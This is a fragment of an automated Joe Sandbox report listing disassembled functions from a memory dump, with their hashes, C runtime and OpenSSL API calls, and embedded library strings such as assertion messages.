                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: .\crypto\err\err.c$unknown
                                                                                                • API String ID: 0-565200744
                                                                                                • Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                                • Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
                                                                                                • Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                                • Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E
                                                                                                APIs
                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
                                                                                                • ___raise_securityfailure.LIBCMT ref: 0042AC7A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                • String ID: 8Q
                                                                                                • API String ID: 3761405300-2096853525
                                                                                                • Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                                • Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
                                                                                                • Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                                • Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45
                                                                                                APIs
                                                                                                • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0
                                                                                                  • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                                                                                • _memset.LIBCMT ref: 00413C83
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                                • String ID: vector<T> too long
                                                                                                • API String ID: 1327501947-3788999226
                                                                                                • Opcode ID: 658efdebe0f2e3c623a36cde5f5e34c723793700e4982d929c621f4f0f040811
                                                                                                • Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
                                                                                                • Opcode Fuzzy Hash: 658efdebe0f2e3c623a36cde5f5e34c723793700e4982d929c621f4f0f040811
                                                                                                • Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9
                                                                                                APIs
                                                                                                Strings
                                                                                                • Assertion failed: %s, file %s, line %d, xrefs: 00420E13
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __calloc_crt
                                                                                                • String ID: Assertion failed: %s, file %s, line %d
                                                                                                • API String ID: 3494438863-969893948
                                                                                                • Opcode ID: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                                                                                                • Instruction ID: 3c5265aa1bf4e9f5ad4874ec33d215fa8746995624eee7e22a7137551c8458fa
                                                                                                • Opcode Fuzzy Hash: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                                                                                                • Instruction Fuzzy Hash: 75F0A97130A2218BE734DB75BC51B6A27D5AF22724B51082FF100DA5C2E73C88425699
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 00480686
                                                                                                  • Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18
                                                                                                Strings
                                                                                                • .\crypto\evp\digest.c, xrefs: 00480638
                                                                                                • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_15_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset_raise
                                                                                                • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                • API String ID: 1484197835-3867593797
                                                                                                • Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                                • Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
                                                                                                • Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                                • Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99